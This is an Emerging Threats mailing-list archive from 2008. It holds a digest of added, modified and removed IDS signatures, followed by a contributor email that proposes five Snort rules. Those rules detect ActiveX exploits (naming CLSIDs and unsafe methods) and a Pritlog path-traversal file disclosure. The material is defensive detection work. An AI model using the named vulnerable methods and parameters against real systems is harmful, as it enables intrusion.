(emerging-rbn.rules) 2406028 - ET RBN Known Russian Business Network Monitored Domains (29) (emerging-rbn.rules) 2407021 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) (emerging-rbn-BLOCK.rules) 2407022 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) (emerging-rbn-BLOCK.rules) 2407023 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) (emerging-rbn-BLOCK.rules) 2407024 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) (emerging-rbn-BLOCK.rules) 2407025 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) (emerging-rbn-BLOCK.rules) 2407026 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) (emerging-rbn-BLOCK.rules) 2407027 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) (emerging-rbn-BLOCK.rules) 2407028 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) (emerging-rbn-BLOCK.rules) [///] Modified active rules: [///] 2007922 - ET TROJAN Backdoor.Win32.VB.brg C&C Checkin (emerging-virus.rules) 2007979 - ET TROJAN Backdoor.Win32.VB.brg C&C Reporting Version (emerging-virus.rules) 2008334 - ET TROJAN Beizhu/Womble/Vipdataend Checking in with Controller (emerging-virus.rules) 2008335 - ET TROJAN Beizhu/Womble/Vipdataend Controller Keepalive (emerging-virus.rules) 2008493 - ET TROJAN Pushdo Checkin (emerging-virus.rules) 2008508 - ET CURRENT_EVENTS Internal User may have Visited an ASPROX Infected Site (emerging.rules) 2008587 - ET TROJAN TroDjan 2.0 Infection Report (emerging-virus.rules) 2400000 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400001 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400002 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400003 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400004 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400005 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400006 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2400007 - ET DROP Spamhaus DROP Listed Traffic Inbound (emerging-drop.rules) 2401000 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401001 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401002 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401003 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401004 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401005 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401006 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2401007 - ET DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (emerging-drop-BLOCK.rules) 2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules) 2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules) 2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules) 2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules) 2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules) 2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules) 2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules) 2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules) 2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules) 2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules) 2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules) 2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules) 2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules) 2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules) 2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules) 2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules) 2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules) 2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules) 2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules) 2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules) 2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules) 2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules) 2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) 2406000 - ET RBN Known Russian Business Network Monitored Domains (1) (emerging-rbn.rules) 2406001 - ET RBN Known Russian Business Network Monitored Domains (2) (emerging-rbn.rules) 2406002 - ET RBN Known Russian Business Network Monitored Domains (3) (emerging-rbn.rules) 2406003 - ET RBN Known Russian Business Network Monitored Domains (4) (emerging-rbn.rules) 2406004 - ET RBN Known Russian Business Network Monitored Domains (5) (emerging-rbn.rules) 2406005 - ET RBN Known Russian Business Network Monitored Domains (6) (emerging-rbn.rules) 2406006 - ET RBN Known Russian Business Network Monitored Domains (7) (emerging-rbn.rules) 2406007 - ET RBN Known Russian Business Network Monitored Domains (8) (emerging-rbn.rules) 2406008 - ET RBN Known Russian Business Network Monitored Domains (9) (emerging-rbn.rules) 2406009 - ET RBN Known Russian Business Network Monitored Domains (10) (emerging-rbn.rules) 2406010 - ET RBN Known Russian Business Network Monitored Domains (11) (emerging-rbn.rules) 2406011 - ET RBN Known Russian Business Network Monitored Domains (12) (emerging-rbn.rules) 2406012 - ET RBN Known Russian Business Network Monitored Domains (13) (emerging-rbn.rules) 2406013 - ET RBN Known Russian Business Network Monitored Domains (14) (emerging-rbn.rules) 2406014 - ET RBN Known Russian Business Network Monitored Domains (15) (emerging-rbn.rules) 2406015 - ET RBN Known Russian Business Network Monitored Domains (16) (emerging-rbn.rules) 2406016 - ET RBN Known Russian Business Network Monitored Domains (17) (emerging-rbn.rules) 2406017 - ET RBN Known Russian Business Network Monitored Domains (18) (emerging-rbn.rules) 2406018 - ET RBN Known Russian Business Network Monitored Domains (19) (emerging-rbn.rules) 2406019 - ET RBN Known Russian Business Network Monitored Domains (20) (emerging-rbn.rules) 2406020 - ET RBN Known Russian Business Network Monitored Domains (21) (emerging-rbn.rules) 2407000 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (1) (emerging-rbn-BLOCK.rules) 2407001 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (2) (emerging-rbn-BLOCK.rules) 2407002 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (3) (emerging-rbn-BLOCK.rules) 2407003 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (4) (emerging-rbn-BLOCK.rules) 2407004 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (5) (emerging-rbn-BLOCK.rules) 2407005 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (6) (emerging-rbn-BLOCK.rules) 2407006 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (7) (emerging-rbn-BLOCK.rules) 2407007 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (8) (emerging-rbn-BLOCK.rules) 2407008 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (9) (emerging-rbn-BLOCK.rules) 2407009 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (10) (emerging-rbn-BLOCK.rules) 2407010 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (11) (emerging-rbn-BLOCK.rules) 2407011 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (12) (emerging-rbn-BLOCK.rules) 2407012 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (13) (emerging-rbn-BLOCK.rules) 2407013 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (14) (emerging-rbn-BLOCK.rules) 2407014 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (15) (emerging-rbn-BLOCK.rules) 2407015 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (16) (emerging-rbn-BLOCK.rules) 2407016 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (17) (emerging-rbn-BLOCK.rules) 2407017 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (18) (emerging-rbn-BLOCK.rules) 2407018 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (19) (emerging-rbn-BLOCK.rules) 2407019 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (20) (emerging-rbn-BLOCK.rules) 2407020 - ET RBN Known Russian Business Network Monitored Domains - BLOCKING (21) (emerging-rbn-BLOCK.rules) [---] Removed rules: [---] 2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules) 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to emerging-drop-BLOCK.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Added to emerging-drop.rules (2): # VERSION 1316 # Generated 2008-10-04 00:03:02 EDT -> Added to emerging-exploit.rules (3): #by Stillsecure #by Stillsecure #by Stillsecure -> Added to emerging-p2p.rules (1): #christopher Campesi -> Added to emerging-rbn-BLOCK.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Added to emerging-rbn.rules (2): # VERSION 77 # Updated 2008-10-01 18:23:28 -> Added to emerging-sid-msg.map (43): 2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking in with Controller 2008493 || ET TROJAN Pushdo Checkin 2008593 || ET TROJAN Ultimate Defender Fake AV Checkin 2008594 || ET MALWARE ezday.co.kr Related Spyware User-Agent Detected (Ezshop) 2008595 || ET P2P SoulSeek P2P Server Connection || url,www.slsknet.org 2008596 || ET SCAN Brute Force Exploit Detector HTTP Buffer Overflow Detection || url,www.snake-basket.de/bed.html 2008597 || ET SCAN Cisco Torch SNMP Scan || url,www.securiteam.com/tools/5EP0F1FEUA.html || url,www.hackingexposedcisco.com/?link=tools 2008598 || ET SCAN Sipsak SIP scan || url,sipsak.org/ 2008599 || ET CURRENT_EVENTS Asprox Cookie SQL Injection Attempt || url,isc.sans.org/diary.html?n&storyid=5092 2008600 || ET MALWARE Suspicious User-Agent Detected (Windows+NT) 2008601 || ET TROJAN Visual Shock Keylogger Reporting to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573 2008602 || ET TROJAN Visual Shock Keylogger Reporting Idle to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573 2008603 || ET MALWARE Suspicious User-Agent Detected (RLMultySocket) 2008604 || ET TROJAN Gamethief/PSW.Magania Checkin 2008605 || ET SCAN Stompy Web Application Session Scan || url,www.darknet.org.uk/2007/03/stompy-the-web-application-session-analyzer-tool/ 2008606 || ET SCAN Enumiax Inter-Asterisk Exchange Protocol Username Scan || url,sourceforge.net/projects/enumiax/ 2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008608 || ET MALWARE WinFixer Trojan Related User-Agent Detected (ElectroSun NetInstaller) 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008610 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Components Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org 2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html 2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/ 2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/ 2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/ 2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2406021 || ET RBN Known Russian Business Network Monitored Domains (22) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406022 || ET RBN Known Russian Business Network Monitored Domains (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406023 || ET RBN Known Russian Business Network Monitored Domains (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406024 || ET RBN Known Russian Business Network Monitored Domains (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406025 || ET RBN Known Russian Business Network Monitored Domains (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406026 || ET RBN Known Russian Business Network Monitored Domains (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406027 || ET RBN Known Russian Business Network Monitored Domains (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406028 || ET RBN Known Russian Business Network Monitored Domains (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407021 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407022 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407023 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407024 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407025 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407026 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407027 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407028 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (43): 2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking in with Controller 2008493 || ET TROJAN Pushdo Checkin 2008593 || ET TROJAN Ultimate Defender Fake AV Checkin 2008594 || ET MALWARE ezday.co.kr Related Spyware User-Agent Detected (Ezshop) 2008595 || ET P2P SoulSeek P2P Server Connection || url,www.slsknet.org 2008596 || ET SCAN Brute Force Exploit Detector HTTP Buffer Overflow Detection || url,www.snake-basket.de/bed.html 2008597 || ET SCAN Cisco Torch SNMP Scan || url,www.securiteam.com/tools/5EP0F1FEUA.html || url,www.hackingexposedcisco.com/?link=tools 2008598 || ET SCAN Sipsak SIP scan || url,sipsak.org/ 2008599 || ET CURRENT_EVENTS Asprox Cookie SQL Injection Attempt || url,isc.sans.org/diary.html?n&storyid=5092 2008600 || ET MALWARE Suspicious User-Agent Detected (Windows+NT) 2008601 || ET TROJAN Visual Shock Keylogger Reporting to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573 2008602 || ET TROJAN Visual Shock Keylogger Reporting Idle to Controller || url,research.sunbelt-software.com/threatdisplay.aspx?threatid=42573 2008603 || ET MALWARE Suspicious User-Agent Detected (RLMultySocket) 2008604 || ET TROJAN Gamethief/PSW.Magania Checkin 2008605 || ET SCAN Stompy Web Application Session Scan || url,www.darknet.org.uk/2007/03/stompy-the-web-application-session-analyzer-tool/ 2008606 || ET SCAN Enumiax Inter-Asterisk Exchange Protocol Username Scan || url,sourceforge.net/projects/enumiax/ 2008607 || ET EXPLOIT Chilkat IMAP ActiveX File Execution and IE DoS || url,www.milw0rm.com/exploits/6600 2008608 || ET MALWARE WinFixer Trojan Related User-Agent Detected (ElectroSun NetInstaller) 2008609 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008610 || ET SCAN Sivus VOIP Vulnerability Scanner SIP Components Scan || url,www.vopsecurity.org/ || url,www.security-database.com/toolswatch/SiVus-VoIP-Security-Scanner-1-09.html 2008611 || ET P2P SoulSeek P2P Login Response || url,www.slsknet.org 2008612 || ET EXPLOIT Autodesk Design Review DWF Viewer ActiveX Control SaveAs Insecure Method || url,secunia.com/Advisories/31989/ || url,retrogod.altervista.org/9sg_autodesk_revit_arch_2009_exploit.html 2008613 || ET EXPLOIT GdPicture Pro ActiveX control SaveAsPDF Insecure Method || url,milw0rm.com/exploits/6638 || url,secunia.com/Advisories/31966/ 2008614 || ET WEB_SQL_INJECTION PHP-Lance show.php catid SQL Injection || url,www.milw0rm.com/exploits/6605 || url,secunia.com/Advisories/32027/ 2008615 || ET WEB_SQL_INJECTION Real Estate Manager realestate-index.php cat_id SQL Injection || url,www.milw0rm.com/exploits/6599 || url,secunia.com/Advisories/32049/ 2008616 || ET WEB_SQL_INJECTION Pilot Online Training Solution news_read.php id SQL Injection || url,www.milw0rm.com/exploits/6613 || url,secunia.com/Advisories/31969/ 2008617 || ET SCAN Wikto Scan || url,www.sensepost.com/research/wikto/WiktoDoc1-51.htm 2406021 || ET RBN Known Russian Business Network Monitored Domains (22) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406022 || ET RBN Known Russian Business Network Monitored Domains (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406023 || ET RBN Known Russian Business Network Monitored Domains (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406024 || ET RBN Known Russian Business Network Monitored Domains (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406025 || ET RBN Known Russian Business Network Monitored Domains (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406026 || ET RBN Known Russian Business Network Monitored Domains (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406027 || ET RBN Known Russian Business Network Monitored Domains (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406028 || ET RBN Known Russian Business Network Monitored Domains (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407021 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (22) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407022 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (23) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407023 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (24) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407024 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (25) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407025 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (26) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407026 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (27) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407027 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (28) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407028 || ET RBN Known Russian Business Network Monitored Domains - BLOCKING (29) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-virus.rules (1): # ref: 4e224c80f62c1b3dc74d295d0633e699 -> Added to emerging-web_sql_injection.rules (3): #by Stillsecure #by Stillsecure #by Stillsecure -> Added to emerging.rules (1): #matt jonkman [---] Removed non-rule lines: [---] -> Removed from emerging-drop-BLOCK.rules (2): # VERSION 1309 # Generated 2008-09-27 00:03:02 EDT -> Removed from emerging-drop.rules (2): # VERSION 1309 # Generated 2008-09-27 00:03:02 EDT -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 63 # Updated 2008-09-25 09:04:53 -> Removed from emerging-rbn.rules (2): # VERSION 63 # Updated 2008-09-25 09:04:53 -> Removed from emerging-sid-msg.map (14): 2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking with Controller 2008493 || ET TROJAN Cutwail/W32.Small.avu Dropper 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (14): 2008334 || ET TROJAN Beizhu/Womble/Vipdataend Checking with Controller 2008493 || ET TROJAN Cutwail/W32.Small.avu Dropper 2404020 || ET DROP Known Bot C&C Server Traffic (group 21) || url,www.shadowserver.org 2405020 || ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE || url,www.shadowserver.org 2500076 || ET COMPROMISED Known Compromised or Hostile Host Traffic (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500077 || ET COMPROMISED Known Compromised or Hostile Host Traffic (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500078 || ET COMPROMISED Known Compromised or Hostile Host Traffic (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500079 || ET COMPROMISED Known Compromised or Hostile Host Traffic (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500080 || ET COMPROMISED Known Compromised or Hostile Host Traffic (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510076 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (77) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510077 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (78) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510078 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (79) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510079 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (80) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510080 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (81) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts From jonkman at jonkmans.com Sat Oct 4 21:25:18 2008 From: jonkman at jonkmans.com (Matt Jonkman) Date: Sat, 04 Oct 2008 21:25:18 -0400 Subject: [Emerging-Sigs] StillSecure: Signatures - 3rd Oct-08 In-Reply-To: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com> References: <5C9E8CCEEB81ED498AC0C3B0054704F3054C2905@webmail.latis.com> Message-ID: <48E8177E.60009@jonkmans.com> Added, sorry for the delay. signatures wrote: > Hi Matt > > > > Please find 5 New Signatures below: > > > > *1. **IAS Helper COM Component iashlpr.dll activex remote DOS * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"IAS Helper COM > Component iashlpr.dll activex remote DOS"; flow:to_client,established; > content:"CLSID"; nocase; content:"6BC096BC-0CE6-11D1-BAAE-00C04FC2E20D"; > distance:0; nocase; content:"PutProperty"; nocase; > classtype:web-application-attack; > reference:url,www.securityfocus.com/archive/1/archive/1/496695/100/0/threaded; > reference:cve,2008-2639; > reference:url,securityreason.com/securityalert/4323; sid:8413; rev:1;) > > > > *2. **Novell ZENWorks for Desktops Remote Heap-Based Buffer Overflow * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Novell ZENWorks for > Desktops Remote Heap-Based Buffer Overflow"; flow:to_client,established; > content:"CLSID"; nocase; content:"0F517994-A6FA-4F39-BD4B-EC2DF00AEEF1"; > distance:0; nocase; content:"CanUninstall"; nocase; > classtype:web-application-attack; reference:bugtraq,31435; > reference:url,securitytracker.com/alerts/2008/Sep/1020951.html; > sid:8414; rev:1;) > > > > *3. **Internet Information Service iisext.dll activex setpassword > Insecure Method * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information > Service iisext.dll activex setpassword Insecure Method"; > flow:to_client,established; content:"CLSID"; nocase; > content:"C3B32488-AFEC-11D1-9868-00A0C922E703"; distance:0; nocase; > content:"SetPassword"; nocase; classtype:web-application-attack; > reference:cve,2008-4301; > reference:url,www.securityfocus.com/archive/1/archive/1/496694/100/0/threaded; > sid:8415; rev:1;) > > > > *4. **Internet Information Service adsiis.dll activex remote DOS * > > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Internet Information > Service adsiis.dll activex remote DOS"; flow:to_client,established; > content:"CLSID"; nocase; content:"D6BFA35E-89F2-11D0-8527-00C04FD8D503"; > distance:0; nocase; content:"GetObject"; nocase; > classtype:web-application-attack; reference:cve,2008-4300; > reference:url,securityreason.com/securityalert/4325; sid:8416; rev:1;) > > > > *5. **Pritlog index.php filename File Disclosure * > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Pritlog > index.php filename File Disclosure"; flow:established,to_server; > content:"GET"; uricontent:"/index.php?option=viewEntry"; nocase; > uricontent:"&filename="; nocase; pcre:"/(\.\.\/){1,}/"; > classtype:web-application-attack; > reference:url,secunia.com/Advisories/31969/; > 